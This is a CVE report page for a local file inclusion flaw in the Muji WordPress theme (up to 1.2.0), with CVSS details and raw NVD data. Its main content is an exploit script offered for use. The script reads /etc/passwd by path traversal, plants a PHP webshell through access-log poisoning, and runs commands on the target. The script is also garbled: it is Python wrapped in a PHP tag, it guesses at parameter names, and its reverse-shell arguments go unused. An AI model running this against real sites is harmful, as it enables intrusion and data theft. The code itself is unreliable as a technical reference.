Security Vulnerability Report
CVE-2025-69068 CVSS 8.1 HIGH

Published: 2026-01-22 17:16:21
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Muji muji allows PHP Local File Inclusion. This issue affects Muji: from n/a through <= 1.2.0.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Muji WordPress theme <= 1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-69068 PoC - Muji Theme Local File Inclusion * Target: AncoraThemes Muji WordPress Theme <= 1.2.0 * Type: Local File Inclusion * * Usage: * 1. Read sensitive files: * python3 poc.py --target http://target.com --action read --file /etc/passwd * * 2. RCE via log poisoning: * python3 poc.py --target http://target.com --action rce --lhost 10.0.0.1 --lport 4444 */ import requests import argparse import sys def read_local_file(target_url, file_path): """Read local files via LFI vulnerability""" # Common vulnerable parameters in Muji theme vulnerable_params = [ 'template', 'file', 'page', 'view', 'load', 'path', 'theme', 'controller' ] for param in vulnerable_params: # Try path traversal to read /etc/passwd payload = f"../../../../../../{file_path}" try: response = requests.get( target_url, params={param: payload}, timeout=10 ) if response.status_code == 200 and any(x in response.text for x in ['root:', 'daemon:', 'bin:']): print(f"[!] SUCCESS! File read via parameter: {param}") print(f"[+] Content:\n{response.text[:1000]}") return True except requests.RequestException as e: continue print("[-] Failed to read file with common parameters") return False def rce_via_log_poisoning(target_url, lhost, lport): """Attempt RCE via log poisoning technique""" print("[*] Attempting RCE via log poisoning...") # Step 1: Poison the access log webshell = "<?php system($_GET['cmd']); ?>" try: requests.get( target_url + webshell, headers={"User-Agent": webshell} ) print("[+] Log poisoned with PHP webshell") except: pass # Step 2: Include the log file log_paths = [ "../../../../../../../../var/log/apache2/access.log", "../../../../../../../../var/log/httpd/access_log", "../../../../../../../../var/log/nginx/access.log" ] for log_path in log_paths: for param in ['template', 'file', 'page']: try: rce_url = f"{target_url}?{param}={log_path}&cmd=id" response = requests.get(rce_url, timeout=10) if "uid=" in response.text: print(f"[+] RCE SUCCESS via {param} parameter!") 
print(f"[+] Command output: {response.text[:500]}") return True except: continue print("[-] RCE attempt failed") return False def main(): parser = argparse.ArgumentParser(description='CVE-2025-69068 PoC') parser.add_argument('--target', required=True, help='Target URL') parser.add_argument('--action', choices=['read', 'rce'], default='read') parser.add_argument('--file', default='/etc/passwd', help='File to read') parser.add_argument('--lhost', help='Listener IP for reverse shell') parser.add_argument('--lport', help='Listener port') args = parser.parse_args() if args.action == 'read': read_local_file(args.target, args.file) elif args.action == 'rce': if not args.lhost or not args.lport: print("[-] RCE requires --lhost and --lport") sys.exit(1) rce_via_log_poisoning(args.target, args.lhost, args.lport) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69068", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:20.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Muji muji allows PHP Local File Inclusion.This issue affects Muji: from n/a through <= 1.2.0."}, {"lang": "es", "value": "La vulnerabilidad de control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP ('inclusión remota de ficheros PHP') en AncoraThemes Muji muji permite inclusión local de ficheros PHP. Este problema afecta a Muji: desde n/a hasta &lt;= 1.2.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/muji/vulnerability/wordpress-muji-theme-1-2-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}